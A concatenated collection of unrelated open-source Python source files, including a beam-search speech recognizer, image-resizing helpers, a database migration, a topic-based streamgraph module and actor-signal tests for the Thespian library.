"Remove a non-core argument, a nominal modifier, from the predpatt."
class p2(SimplifyRule):
"Remove an argument of other type from the predpatt."
class q(SimplifyRule):
"Remove an adverbial modifier in the predicate phrase."
class r(SimplifyRule):
"Remove auxiliary in the predicate phrase."
#____________________________________________________
# Rules for manually added tokens (English specific)
class u(Rule):
"Strip the punct in the phrase."
#____________________________________________________
# English-specific rules
class LanguageSpecific(Rule):
lang = None
class EnglishSpecific(Rule):
lang = 'English'
class en_relcl_dummy_arg_filter(EnglishSpecific):
def __init__(self):
super(en_relcl_dummy_arg_filter, self).__init__()
if __name__ == '__main__':
print(a1(), a1().explain())
|
bnpy/datasets/zzz_unsupported/JainNealEx1.py
|
jun2tong/bnp-anomaly
| 184 |
101841
|
<filename>bnpy/datasets/zzz_unsupported/JainNealEx1.py
'''
JainNealEx1.py
Toy binary data from K=5 states.
Usage
---------
To take a look at the states, just run this script as an executable.
$ python JainNealEx1.py
'''
import numpy as np
import scipy.linalg
from bnpy.data import XData
def get_short_name():
''' Return short string used in filepaths to store solutions
'''
return 'JainNealEx1'
def get_data_info():
return 'Toy Binary Data. K=%d true clusters. D=%d.' % (K, D)
def get_data(seed=8675309, nObsTotal=None, nPerState=20, **kwargs):
'''
Args
-------
seed : integer seed for random number generator,
used for actually *generating* the data
nObsTotal : total number of observations for the dataset.
Returns
-------
Data : bnpy XData object, with nObsTotal observations
'''
if nObsTotal is not None:
nPerState = nObsTotal // K
X, TrueZ = genToyData(seed=seed, nPerState=nPerState)
Data = XData(X=X, TrueZ=TrueZ)
Data.name = get_short_name()
Data.summary = get_data_info()
return Data
# Make A in 3D
#######################################################
K = 5
D = 6
phi = np.asarray([
[.95, .95, .95, .95, .95, .95],
[.05, .05, .05, .05, .95, .95],
[.95, .05, .05, .95, .95, .95],
[.05, .05, .05, .05, .05, .05],
[.95, .95, .95, .95, .05, .05],
])
def genToyData(seed=1234, nPerState=20):
'''
'''
prng = np.random.RandomState(seed)
X = np.zeros((K * nPerState, D))
Z = np.zeros(K * nPerState)
for k in range(K):
start = k * nPerState
stop = (k + 1) * nPerState
X[start:stop] = prng.rand(nPerState, D) < phi[k][np.newaxis, :]
Z[start:stop] = k * np.ones(nPerState)
return X, Z
if __name__ == '__main__':
from matplotlib import pylab
rcParams = pylab.rcParams
rcParams['ps.fonttype'] = 42
rcParams['ps.useafm'] = True
rcParams['xtick.labelsize'] = 15
rcParams['ytick.labelsize'] = 15
rcParams['font.size'] = 25
X, Z = genToyData()
pylab.imshow(X, aspect=X.shape[1] / float(X.shape[0]),
interpolation='nearest', cmap='bone')
pylab.show(block=True)
|
otrans/recognize/speech2text.py
|
jiyanglii/OpenTransformer
| 321 |
101858
|
<filename>otrans/recognize/speech2text.py
import torch
from otrans.data import EOS, BOS
from otrans.recognize.base import Recognizer
from packaging import version
class SpeechToTextRecognizer(Recognizer):
def __init__(self, model, lm=None, lm_weight=0.1, ctc_weight=0.0, beam_width=5, nbest=1,
max_len=50, idx2unit=None, penalty=0, lamda=5, ngpu=1, apply_cache=False):
super(SpeechToTextRecognizer, self).__init__(model, idx2unit, lm, lm_weight, ngpu)
self.beam_width = beam_width
self.max_len = max_len
self.nbest = nbest
self.penalty = penalty
self.lamda = lamda
self.ctc_weight = ctc_weight
self.lm_weight = lm_weight
self.attn_weights = {}
self.apply_cache = False
def encode(self, inputs, inputs_mask, cache=None):
new_cache = {}
inputs, inputs_mask, fe_cache = self.model.frontend.inference(inputs, inputs_mask, cache['frontend'] if cache is not None else None)
new_cache['frontend'] = fe_cache
# memory, memory_mask, enc_cache, enc_attn_weights = self.model.encoder.inference(inputs, inputs_mask, cache['encoder'] if cache is not None else None)
memory, memory_mask, enc_attn_weights = self.model.encoder(inputs, inputs_mask)
# new_cache['encoder'] = enc_cache
return memory, memory_mask, new_cache, enc_attn_weights
def decode(self, preds, memory, memory_mask, cache=None):
log_probs, dec_cache, dec_attn_weights = self.model.decoder.inference(preds, memory, memory_mask, cache)
return log_probs, dec_cache, dec_attn_weights
def recognize(self, inputs, inputs_mask):
cache = {'fronend': None, 'encoder': None, 'decoder': None, 'lm': None}
self.attn_weights = {}
memory, memory_mask, _, enc_attn_weights = self.encode(inputs, inputs_mask)
self.attn_weights['encoder'] = enc_attn_weights
self.attn_weights['decoder'] = []
b, t, v = memory.size()
beam_memory = memory.unsqueeze(1).repeat([1, self.beam_width, 1, 1]).view(b * self.beam_width, t, v)
beam_memory_mask = memory_mask.unsqueeze(1).repeat([1, self.beam_width, 1]).view(b * self.beam_width, t)
preds = torch.ones([b * self.beam_width, 1], dtype=torch.long, device=memory.device) * BOS
scores = torch.FloatTensor([0.0] + [-float('inf')] * (self.beam_width - 1))
scores = scores.to(memory.device).repeat([b]).unsqueeze(1)
ending_flag = torch.zeros_like(scores, dtype=torch.bool)
with torch.no_grad():
for _ in range(1, self.max_len+1):
preds, cache, scores, ending_flag = self.decode_step(
preds, beam_memory, beam_memory_mask, cache, scores, ending_flag)
# whether stop or not
if ending_flag.sum() == b * self.beam_width:
break
scores = scores.view(b, self.beam_width)
preds = preds.view(b, self.beam_width, -1)
lengths = torch.sum(torch.ne(preds, EOS).float(), dim=-1)
# length penalty
if self.penalty:
lp = torch.pow((self.lamda + lengths) /
(self.lamda + 1), self.penalty)
scores /= lp
sorted_scores, offset_indices = torch.sort(scores, dim=-1, descending=True)
base_indices = torch.arange(b, dtype=torch.long, device=offset_indices.device) * self.beam_width
base_indices = base_indices.unsqueeze(1).repeat([1, self.beam_width]).view(-1)
preds = preds.view(b * self.beam_width, -1)
indices = offset_indices.view(-1) + base_indices
# remove BOS
sorted_preds = preds[indices].view(b, self.beam_width, -1)
nbest_preds = sorted_preds[:, :min(self.beam_width, self.nbest), 1:]
nbest_scores = sorted_scores[:, :min(self.beam_width, self.nbest)]
return self.nbest_translate(nbest_preds), nbest_scores
def decode_step(self, preds, memory, memory_mask, cache, scores, flag):
""" decode an utterance in a stepwise way"""
batch_size = int(scores.size(0) / self.beam_width)
batch_log_probs, dec_cache, dec_attn_weights = self.decode(preds, memory, memory_mask, cache['decoder'])
if self.lm is not None:
batch_lm_log_probs, lm_hidden = self.lm_decode(preds, cache['lm'])
batch_lm_log_probs = batch_lm_log_probs.squeeze(1)
batch_log_probs = batch_log_probs + self.lm_weight * batch_lm_log_probs
else:
lm_hidden = None
if batch_log_probs.dim() == 3:
batch_log_probs = batch_log_probs.squeeze(1)
last_k_scores, last_k_preds = batch_log_probs.topk(self.beam_width)
last_k_scores = mask_finished_scores(last_k_scores, flag)
last_k_preds = mask_finished_preds(last_k_preds, flag)
# update scores
scores = scores + last_k_scores
scores = scores.view(batch_size, self.beam_width * self.beam_width)
# pruning
scores, offset_k_indices = torch.topk(scores, k=self.beam_width)
scores = scores.view(-1, 1)
device = scores.device
base_k_indices = torch.arange(batch_size, device=device).view(-1, 1).repeat([1, self.beam_width])
base_k_indices *= self.beam_width ** 2
best_k_indices = base_k_indices.view(-1) + offset_k_indices.view(-1)
# update predictions
best_k_preds = torch.index_select(
last_k_preds.view(-1), dim=-1, index=best_k_indices)
if version.parse(torch.__version__) < version.parse('1.6.0'):
preds_index = best_k_indices.div(self.beam_width)
else:
preds_index = best_k_indices.floor_divide(self.beam_width)
preds_symbol = torch.index_select(
preds, dim=0, index=preds_index)
preds_symbol = torch.cat(
(preds_symbol, best_k_preds.view(-1, 1)), dim=1)
# dec_hidden = reselect_hidden_list(dec_hidden, self.beam_width, best_k_indices)
# lm_hidden = reselect_hidden_list(lm_hidden, self.beam_width, best_k_indices)
# finished or not
end_flag = torch.eq(preds_symbol[:, -1], EOS).view(-1, 1)
# hidden = {
# 'decoder': dec_hidden,
# 'lm': lm_hidden
# }
return preds_symbol, cache, scores, end_flag
def mask_finished_scores(score, flag):
"""
If a sequence is finished, we only allow one alive branch. This function aims to give one branch a zero score
and the rest -inf score.
Args:
score: A real value array with shape [batch_size * beam_size, beam_size].
flag: A bool array with shape [batch_size * beam_size, 1].
Returns:
A real value array with shape [batch_size * beam_size, beam_size].
"""
beam_width = score.size(-1)
zero_mask = torch.zeros_like(flag, dtype=torch.bool)
if beam_width > 1:
unfinished = torch.cat(
(zero_mask, flag.repeat([1, beam_width - 1])), dim=1)
finished = torch.cat(
(flag.bool(), zero_mask.repeat([1, beam_width - 1])), dim=1)
else:
unfinished = zero_mask
finished = flag.bool()
score.masked_fill_(unfinished, -float('inf'))
score.masked_fill_(finished, 0)
return score
def mask_finished_preds(pred, flag):
"""
If a sequence is finished, all of its branch should be </S> (3).
Args:
pred: A int array with shape [batch_size * beam_size, beam_size].
flag: A bool array with shape [batch_size * beam_size, 1].
Returns:
A int array with shape [batch_size * beam_size].
"""
beam_width = pred.size(-1)
finished = flag.repeat([1, beam_width])
return pred.masked_fill_(finished.bool(), EOS)
def reselect_hidden(tensor, beam_width, indices):
n_layers, batch_size, hidden_size = tensor.size()
tensor = tensor.transpose(0, 1).unsqueeze(1).repeat([1, beam_width, 1, 1])
tensor = tensor.reshape(batch_size * beam_width, n_layers, hidden_size)
new_tensor = torch.index_select(tensor, dim=0, index=indices)
new_tensor = new_tensor.transpose(0, 1).contiguous()
return new_tensor
def reselect_hidden_list(tensor_list, beam_width, indices):
if tensor_list is None:
return None
new_tensor_list = []
for tensor in tensor_list:
if isinstance(tensor, tuple):
h = reselect_hidden(tensor[0], beam_width, indices)
c = reselect_hidden(tensor[1], beam_width, indices)
new_tensor_list.append((h, c))
else:
new_tensor_list.append(reselect_hidden(tensor, beam_width, indices))
return new_tensor_list
|
cacreader/swig-4.0.2/Examples/test-suite/python/using_extend_runme.py
|
kyletanyag/LL-Smartcard
| 1,031 |
101908
|
from using_extend import *
f = FooBar()
if f.blah(3) != 3:
raise RuntimeError, "blah(int)"
if f.blah(3.5) != 3.5:
raise RuntimeError, "blah(double)"
if f.blah("hello") != "hello":
raise RuntimeError, "blah(char *)"
if f.blah(3, 4) != 7:
raise RuntimeError, "blah(int,int)"
if f.blah(3.5, 7.5) != (3.5 + 7.5):
raise RuntimeError, "blah(double,double)"
if f.duh(3) != 3:
raise RuntimeError, "duh(int)"
|
animeMusic_server/helper/image.py
|
waahah/animeMusic
| 287 |
101911
|
# -*- coding:utf-8 -*-
# 图片处理代码基于http://fc-lamp.blog.163.com/blog/static/174566687201282424018946/小幅度修改
from PIL import Image as image
def resizeImg(**args):
args_key = {'path': '', 'out_path': '', 'width': '', 'height': '', 'quality': 75}
arg = {}
for key in args_key:
if key in args:
arg[key] = args[key]
else:
arg[key] = None
im = image.open(arg['path'])
ori_w, ori_h = im.size
widthRatio = heightRatio = None
ratio = 1
if (arg['width'] and ori_w and ori_w > arg['width']) or (arg['height'] and ori_h and ori_h > arg['height']):
if arg['width'] and ori_w > arg['width']:
widthRatio = float(arg['width']) / ori_w # 正确获取小数的方式
if arg['height'] and ori_h > arg['height']:
heightRatio = float(arg['height']) / ori_h
if widthRatio and heightRatio:
if widthRatio < heightRatio:
ratio = widthRatio
else:
ratio = heightRatio
if widthRatio and not heightRatio:
ratio = widthRatio
if heightRatio and not widthRatio:
ratio = heightRatio
newWidth = int(ori_w * ratio)
newHeight = int(ori_h * ratio)
else:
newWidth = ori_w
newHeight = ori_h
im.resize((newWidth, newHeight), image.ANTIALIAS).convert('RGB').save(arg['out_path'], quality=arg['quality'])
def clipResizeImg(**args):
args_key = {'path': '', 'out_path': '', 'width': '', 'height': '', 'quality': 75}
arg = {}
for key in args_key:
if key in args:
arg[key] = args[key]
im = image.open(arg['path'])
ori_w, ori_h = im.size
dst_scale = float(arg['height']) / arg['width'] # 目标高宽比
width = ori_w
height = int(width * dst_scale)
x = 0
y = (ori_h - height) / 3
# 裁剪
box = (x, y, width + x, height + y)
# 这里的参数可以这么认为:从某图的(x,y)坐标开始截,截到(width+x,height+y)坐标
# 所包围的图像,crop方法与php中的imagecopy方法大为不一样
newIm = im.crop(box)
im = None
# 压缩
ratio = float(arg['width']) / width
newWidth = int(width * ratio)
newHeight = int(height * ratio)
newIm.resize((newWidth, newHeight), image.ANTIALIAS).convert('RGB').save(arg['out_path'], quality=arg['quality'])
if __name__ == '__main__':
clipResizeImg(path='/home/xiaoc/2.jpeg', out_path='/home/xiaoc/2.out.jpeg', width=1220, height=604, quality=85)
|
app/backend/src/couchers/migrations/versions/62fcd41e4dcd_implement_signup_flow_v2.py
|
foormea/couchers
| 226 |
101955
|
"""Implement signup flow v2
Revision ID: <KEY>
Revises: 1c7784767710
Create Date: 2021-06-25 08:17:24.410658
"""
import geoalchemy2
import sqlalchemy as sa
from alembic import op
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = "<KEY>"
down_revision = "1c7784767710"
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"signup_flows",
sa.Column("id", sa.BigInteger(), nullable=False),
sa.Column("created", sa.DateTime(timezone=True), server_default=sa.text("now()"), nullable=False),
sa.Column("flow_token", sa.String(), nullable=False),
sa.Column("email_verified", sa.Boolean(), nullable=False),
sa.Column("email_sent", sa.Boolean(), nullable=False),
sa.Column("email_token", sa.String(), nullable=True),
sa.Column("email_token_expiry", sa.DateTime(timezone=True), nullable=True),
sa.Column("name", sa.String(), nullable=False),
sa.Column("email", sa.String(), nullable=False),
sa.Column("username", sa.String(), nullable=True),
sa.Column("hashed_password", sa.LargeBinary(), nullable=True),
sa.Column("birthdate", sa.Date(), nullable=True),
sa.Column("gender", sa.String(), nullable=True),
sa.Column(
"hosting_status",
postgresql.ENUM("can_host", "maybe", "cant_host", name="hostingstatus", create_type=False),
nullable=True,
),
sa.Column("city", sa.String(), nullable=True),
sa.Column(
"geom",
geoalchemy2.types.Geometry(geometry_type="POINT", srid=4326, from_text="ST_GeomFromEWKT", name="geometry"),
nullable=True,
),
sa.Column("geom_radius", sa.Float(), nullable=True),
sa.Column("accepted_tos", sa.Integer(), nullable=True),
sa.Column("filled_feedback", sa.Boolean(), nullable=False),
sa.Column("ideas", sa.String(), nullable=True),
sa.Column("features", sa.String(), nullable=True),
sa.Column("experience", sa.String(), nullable=True),
sa.Column("contribute", sa.Enum("yes", "maybe", "no", name="contributeoption"), nullable=True),
sa.Column("contribute_ways", sa.ARRAY(sa.String()), nullable=True),
sa.Column("expertise", sa.String(), nullable=True),
sa.PrimaryKeyConstraint("id", name=op.f("pk_signup_flows")),
sa.UniqueConstraint("email", name=op.f("uq_signup_flows_email")),
sa.UniqueConstraint("flow_token", name=op.f("uq_signup_flows_flow_token")),
sa.UniqueConstraint("username", name=op.f("uq_signup_flows_username")),
)
op.create_table(
"contributor_forms",
sa.Column("id", sa.BigInteger(), nullable=False),
sa.Column("user_id", sa.BigInteger(), nullable=False),
sa.Column("ideas", sa.String(), nullable=True),
sa.Column("features", sa.String(), nullable=True),
sa.Column("experience", sa.String(), nullable=True),
sa.Column("contribute", sa.Enum("yes", "maybe", "no", name="contributeoption"), nullable=True),
sa.Column("contribute_ways", sa.ARRAY(sa.String()), nullable=True),
sa.Column("expertise", sa.String(), nullable=True),
sa.ForeignKeyConstraint(["user_id"], ["users.id"], name=op.f("fk_contributor_forms_user_id_users")),
sa.PrimaryKeyConstraint("id", name=op.f("pk_contributor_forms")),
)
op.create_index(op.f("ix_contributor_forms_user_id"), "contributor_forms", ["user_id"], unique=False)
op.drop_table("signup_tokens")
def downgrade():
op.create_table(
"signup_tokens",
sa.Column("token", sa.VARCHAR(), autoincrement=False, nullable=False),
sa.Column("email", sa.VARCHAR(), autoincrement=False, nullable=False),
sa.Column(
"created",
postgresql.TIMESTAMP(timezone=True),
server_default=sa.text("now()"),
autoincrement=False,
nullable=False,
),
sa.Column("expiry", postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=False),
sa.PrimaryKeyConstraint("token", name="pk_signup_tokens"),
)
op.drop_index(op.f("ix_contributor_forms_user_id"), table_name="contributor_forms")
op.drop_table("contributor_forms")
op.drop_table("signup_flows")
|
exercises/pt/solution_01_03_02.py
|
Jette16/spacy-course
| 2,085 |
101960
|
<gh_stars>1000+
# Importar a classe da língua inglesa (English) e criar um objeto nlp
from spacy.lang.en import English
nlp = English()
# Processar o texto
doc = nlp("I like tree kangaroos and narwhals.")
# Uma partição do Doc para "tree kangaroos"
tree_kangaroos = doc[2:4]
print(tree_kangaroos.text)
# Uma partição do Doc para "tree kangaroos and narwhals" (sem incluir o ".")
tree_kangaroos_and_narwhals = doc[2:6]
print(tree_kangaroos_and_narwhals.text)
|
server/workers/dataprocessing/src/streamgraph.py
|
chreman/Headstart
| 111 |
101965
|
<gh_stars>100-1000
import pandas as pd
import logging
import sys
import re
import numpy as np
from itertools import chain
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.decomposition import NMF, LatentDirichletAllocation
formatter = logging.Formatter(fmt='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
np.random.seed(42)
class Streamgraph(object):
def __init__(self, loglevel="INFO"):
self.logger = logging.getLogger(__name__)
self.logger.setLevel(loglevel)
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(formatter)
handler.setLevel(loglevel)
self.logger.addHandler(handler)
def tokenize(self, s):
#return re.split("; | - |, |: ", s)
return re.split("; ", s)
def get_streamgraph_data(self, metadata, query, n=12, method="count"):
metadata = pd.DataFrame.from_records(metadata)
df = metadata.copy()
df.year = pd.to_datetime(df.year).map(lambda x: x.replace(month=1, day=1))
df = df[df.subject.map(lambda x: x is not None)]
df.subject = df.subject.map(lambda x: [s.lower() for s in self.tokenize(x)] if isinstance(x, str) else "")
df = df[df.subject.map(lambda x: x != [])]
df["boundary_label"] = df.year
df = df.explode('subject')
df = df[df.subject != ""]
counts = self.get_counts(df)
boundaries = self.get_boundaries(df)
daterange = self.get_daterange(boundaries)
data = pd.merge(counts, boundaries, on='year')
top_n = self.get_top_n(metadata.copy(), query, n, method)
data = (data[data.subject.str.contains('|'.join(top_n), case=False)]
.sort_values("year")
.reset_index(drop=True))
sg_data = {}
sg_data["x"], sg_data["subject"] = self.build_sg_data(daterange, data, top_n)
return sg_data
@staticmethod
def get_x_axis(daterange):
return [str(x.year) for x in daterange]
@staticmethod
def get_daterange(boundaries):
daterange = pd.date_range(start=min(boundaries.year),
end=max(boundaries.year),
freq='AS')
if len(daterange) > 0:
return sorted(daterange)
else:
return sorted(pd.unique(boundaries.year))
@staticmethod
def get_stream_range(df):
stream_range = {
"min": min(df.year),
"max": max(df.year),
"range": max(df.year) - min(df.year)
}
return stream_range
@staticmethod
def get_counts(df):
counts = (df.groupby(["year", "subject"])
.agg({'subject': 'count', 'id': lambda x: ", ".join(x)}))
counts.rename({"subject": "counts"}, axis=1, inplace=True)
counts.reset_index(inplace=True)
return counts
@staticmethod
def get_boundaries(df):
boundaries = df[["boundary_label", "year"]].drop_duplicates()
return boundaries
def get_top_n(self, df, query, n, method):
df = df[df.subject.map(lambda x: len(x) > 2)]
corpus = df.subject.tolist()
# set stopwords , stop_words='english'
tf_vectorizer = CountVectorizer(max_df=0.95, min_df=2,
tokenizer=lambda x: self.tokenize(x),
lowercase=True,
stop_words=[query]
)
tfidf_vectorizer = TfidfVectorizer(max_df=0.95, min_df=2,
tokenizer=lambda x: self.tokenize(x),
lowercase=True,
stop_words=[query]
)
if method == "count":
tf = tf_vectorizer.fit_transform(corpus)
counts = pd.DataFrame(tf.toarray(),
columns=tf_vectorizer.get_feature_names())
candidates = counts.sum().sort_values(ascending=False).index.tolist()
candidates = [c for c in candidates if len(c) > 2]
top_n = candidates[:n]
if method == "tfidf":
tfidf = tfidf_vectorizer.fit_transform(corpus)
weights = pd.DataFrame(tfidf.toarray(),
columns=tfidf_vectorizer.get_feature_names())
candidates = weights.sum().sort_values(ascending=False).index.tolist()
candidates = [c for c in candidates if len(c) > 2]
top_n = candidates[:n]
if method == "nmf":
tfidf = tfidf_vectorizer.fit_transform(corpus)
nmf = NMF(n_components=n,
alpha=.1, l1_ratio=.5, init='nndsvd',
random_state=42).fit(tfidf)
top_n = list(chain.from_iterable(
[self.get_top_words(t, tfidf_vectorizer.get_feature_names(), 1)
for t in nmf.components_]))
if method == "lda":
tf = tf_vectorizer.fit_transform(corpus)
lda = LatentDirichletAllocation(n_components=n, max_iter=20,
learning_method='batch',
learning_offset=50.,
random_state=42).fit(tf)
top_n = list(chain.from_iterable(
[self.get_top_words(t, tf_vectorizer.get_feature_names(), 1)
for t in lda.components_]))
return top_n
@staticmethod
def get_top_words(topic, feature_names, n):
indices = topic.argsort()[::-1]
words = [feature_names[i] for i in indices]
words = [w for w in words if len(w) > 2]
return words[:n]
def build_sg_data(self, daterange, data, top_n):
x = pd.DataFrame(daterange, columns=["year"])
temp = []
for item in top_n:
tmp = (pd.merge(data[data.subject.str.contains(item, case=False)], x,
left_on="year", right_on="year",
how="right")
.groupby("year")
.agg({"subject": "sum",
"counts": "sum",
"id": aggregate_ids,
"boundary_label": "max"})
.fillna({"counts": 0, "subject": item, "id": "NA"})
.sort_values("year"))
tmp["subject"] = item
tmp["counts"] = tmp["id"].map(lambda x: len(set(filter(lambda x: x!="NA", x.split(", ")))))
y = tmp.counts.astype(int).to_list()
ids_timestep = tmp.id.map(lambda x: list(set(filter(lambda x: x!="NA", x.split(", "))))).tolist()
temp.append({"name": item, "y": y,
"ids_timestep": ids_timestep})
df = pd.DataFrame.from_records(temp)
df["name"] = df.name.apply(str.capitalize)
x, df = self.reduce_daterange(daterange, df)
df = df[df["ids_overall"].map(lambda x: len(x) != 0)]
return x, df.to_dict(orient="records")
def reduce_daterange(self, daterange, df):
x = self.get_x_axis(daterange)
yearly_sums = pd.DataFrame(df.y.to_list()).T.sum(axis=1)
yearly_sums_cum = yearly_sums.cumsum()
# 5% which is chosen here is an arbitrary value, could also be higher 10% or lower
min_value = int(yearly_sums.sum() * 0.05)
start_index = yearly_sums_cum[yearly_sums_cum > min_value].index[0]
df.y = df.y.map(lambda x: x[start_index:])
df.ids_timestep = df.ids_timestep.map(lambda x: x[start_index:])
x = x[start_index:]
df["ids_overall"] = df.ids_timestep.map(lambda x: list(chain.from_iterable(x)))
return x, df
@staticmethod
def reduce_metadata_set(metadata, sg_data):
metadata = pd.read_json(metadata)
df = pd.DataFrame.from_records(sg_data["subject"])
all_ids = set(chain.from_iterable(df.ids_overall))
metadata = metadata[metadata.id.map(lambda x: x in all_ids)]
return metadata.to_json(orient="records")
def aggregate_ids(series):
try:
return ", ".join(pd.unique(series))
except Exception:
return "NA"
|
DjangoTutorial_v3.5/lesson1/task1/tests_subtask4.py
|
behzod/pycharm-courses
| 213 |
101972
|
from test_helper import run_common_tests, failed, passed, get_answer_placeholders, do_not_run_on_check
if __name__ == '__main__':
do_not_run_on_check()
run_common_tests()
|
CalibTracker/SiStripESProducers/python/SiStripGainESProducer_cfi.py
|
ckamtsikis/cmssw
| 852 |
101996
|
import FWCore.ParameterSet.Config as cms
siStripGainESProducer = cms.ESProducer("SiStripGainESProducer",
appendToDataLabel = cms.string(''),
printDebug = cms.untracked.bool(False),
AutomaticNormalization = cms.bool(False),
APVGain = cms.VPSet(
cms.PSet(
Record = cms.string('SiStripApvGainRcd'),
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.)
),
cms.PSet(
Record = cms.string('SiStripApvGain2Rcd'),
Label = cms.untracked.string(''),
NormalizationFactor = cms.untracked.double(1.)
)
)
)
|
src/lightning_classes/lightning_ner.py
|
mohamedbakrey12/prpjectINDeepLearning
| 122 |
101999
|
from typing import Dict
import numpy as np
import pytorch_lightning as pl
import torch
from omegaconf import DictConfig
from src.utils.technical_utils import load_obj
class LitNER(pl.LightningModule):
def __init__(self, cfg: DictConfig, tag_to_idx: Dict):
super(LitNER, self).__init__()
self.cfg = cfg
self.tag_to_idx = tag_to_idx
self.model = load_obj(cfg.model.class_name)(
embeddings_dim=cfg.datamodule.embeddings_dim, tag_to_idx=tag_to_idx, **cfg.model.params
)
self.metrics = torch.nn.ModuleDict(
{
self.cfg.metric.metric.metric_name: load_obj(self.cfg.metric.metric.class_name)(
**cfg.metric.metric.params
)
}
)
if 'other_metrics' in self.cfg.metric.keys():
for metric in self.cfg.metric.other_metrics:
self.metrics.update({metric.metric_name: load_obj(metric.class_name)(**metric.params)})
def forward(self, x, lens, *args, **kwargs):
return self.model(x, lens)
def configure_optimizers(self):
optimizer = load_obj(self.cfg.optimizer.class_name)(self.model.parameters(), **self.cfg.optimizer.params)
scheduler = load_obj(self.cfg.scheduler.class_name)(optimizer, **self.cfg.scheduler.params)
return (
[optimizer],
[{'scheduler': scheduler, 'interval': self.cfg.scheduler.step, 'monitor': self.cfg.scheduler.monitor}],
)
def training_step(self, batch, batch_idx):
embeds, lens, labels = batch
# transform tokens to embeddings
embeds = self._vectorizer(embeds)
score, tag_seq, loss = self.model(embeds, lens, labels)
labels = labels.flatten()
labels = labels[labels != self.tag_to_idx['PAD']]
self.log('train_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)
for metric in self.metrics:
score = self.metrics[metric](tag_seq, labels)
self.log(f'train_{metric}', score, on_step=True, on_epoch=True, prog_bar=True, logger=True)
return loss
def validation_step(self, batch, batch_idx):
embeds, lens, labels = batch
embeds = self._vectorizer(embeds)
score, tag_seq, loss = self.model(embeds, lens, labels)
labels = labels.flatten()
labels = labels[labels != self.tag_to_idx['PAD']]
self.log('valid_loss', loss, on_step=True, on_epoch=True, prog_bar=True, logger=True)
for metric in self.metrics:
score = self.metrics[metric](tag_seq, labels)
self.log(f'valid_{metric}', score, on_step=True, on_epoch=True, prog_bar=True, logger=True)
|
ex/parser/scanner_command_unabbreviate.py
|
my-personal-forks/Vintageous
| 1,146 |
102015
|
from .state import EOF
from .tokens import TokenEof
from .tokens_base import TOKEN_COMMAND_UNABBREVIATE
from .tokens_base import TokenOfCommand
from Vintageous import ex
@ex.command('unabbreviate', 'una')
class TokenUnabbreviate(TokenOfCommand):
def __init__(self, params, *args, **kwargs):
super().__init__(params,
TOKEN_COMMAND_UNABBREVIATE,
'unabbreviate', *args, **kwargs)
self.target_command = 'ex_unabbreviate'
@property
def short(self):
return self.params['lhs']
def scan_command_unabbreviate(state):
params = {
'lhs': None
}
m = state.expect_match(r'\s+(?P<lhs>.+?)\s*$')
params.update(m.groupdict())
return None, [TokenUnabbreviate(params), TokenEof()]
|
auctioning_platform/auctions/auctions/application/use_cases/ending_auction.py
|
nhdinh/smp-modulith
| 299 |
102028
|
<reponame>nhdinh/smp-modulith
from dataclasses import dataclass
from auctions.application.repositories import AuctionsRepository
from auctions.domain.value_objects import AuctionId
@dataclass
class EndingAuctionInputDto:
auction_id: AuctionId
class EndingAuction:
def __init__(self, auctions_repo: AuctionsRepository) -> None:
self.auctions_repo = auctions_repo
def execute(self, input_dto: EndingAuctionInputDto) -> None:
auction = self.auctions_repo.get(input_dto.auction_id)
# ???
self.auctions_repo.save(auction)
|
config/custom_components/ziggonext/const.py
|
LRvdLinden/homeassistant-config
| 288 |
102064
|
<filename>config/custom_components/ziggonext/const.py<gh_stars>100-1000
"""Constants for the Ziggo Mediabox Next integration."""
ZIGGO_API = "ziggo_api"
CONF_COUNTRY_CODE = "country_code"
RECORD = "record"
REWIND = "rewind"
FAST_FORWARD = "fast_forward"
|
thespian/test/test_actorSignals.py
|
dendron2000/Thespian
| 210 |
102094
|
import logging
import time, datetime
from thespian.actors import *
from thespian.test import *
import signal
import os
class KillMeActor(Actor):
def receiveMessage(self, msg, sender):
logging.info('EchoActor got %s (%s) from %s', msg, type(msg), sender)
self.send(sender, os.getpid())
class ParentActor(Actor):
def receiveMessage(self, msg, sender):
if msg == 'child':
self.send(self.createActor(ChildActor), sender)
if msg == 'hello':
if not hasattr(self, 'rspmsg'):
self.rspmsg = 'world'
self.send(sender, self.rspmsg)
if isinstance(msg, ChildActorExited):
self.rspmsg = 'goodbye'
class ChildActor(Actor):
def receiveMessage(self, msg, sender):
if isinstance(msg, ActorAddress):
self.send(msg, os.getpid())
smallwait = datetime.timedelta(milliseconds=350)
@pytest.fixture(params=[
# Non-deadly
'signal.SIGCONT-world',
# 'signal.SIGINT-world',
# 'signal.SIGUSR1-world',
# 'signal.SIGUSR2-world',
# 'signal.SIGHUP-world',
# # Deadly
# 'signal.SIGTERM-goodbye',
# 'signal.SIGQUIT-goodbye',
# 'signal.SIGABRT-goodbye',
# 'signal.SIGKILL-goodbye',
])
def testSignal(request):
return request.param
class TestFuncSafeActorSignals(object):
def testCreateActorSystem(self, asys):
pass
def testSimpleActor(self, asys):
killme = asys.createActor(KillMeActor)
def testSigCont(self, asys):
killme = asys.createActor(KillMeActor)
killme_pid = asys.ask(killme, 'pid?', smallwait)
assert killme_pid # not 0 or None
os.kill(killme_pid, signal.SIGCONT)
assert killme_pid == asys.ask(killme, 'pid again?', smallwait)
def testChildSigCont(self, asys):
parent = asys.createActor(ParentActor)
assert 'world' == asys.ask(parent, 'hello', smallwait)
child_pid = asys.ask(parent, 'child', smallwait*3)
assert child_pid # not 0 or None
os.kill(child_pid, signal.SIGCONT)
assert 'world' == asys.ask(parent, 'hello', smallwait)
# n.b. Cannot test unsafe signals with the simple actor system because
# the signals affect the testing process; often causing it to exit.
class TestFuncMultiProcActorSignals(object):
def test_signal(self, asys, testSignal):
if 'proc' not in asys.base_name:
pytest.skip('Cannot send signals to primary testing process')
signame, response = testSignal.split('-')
killme = asys.createActor(KillMeActor)
killme_pid = asys.ask(killme, 'pid?', smallwait)
assert killme_pid # not 0 or None
os.kill(killme_pid, eval(signame))
time.sleep(0.2) # allow signal to be delivered
r = asys.ask(killme, 'pid again?', smallwait)
assert (killme_pid if response == 'world' else None) == r
def testChildSig(self, testSignal, asys):
if 'proc' not in asys.base_name:
pytest.skip('Cannot send signals to primary testing process')
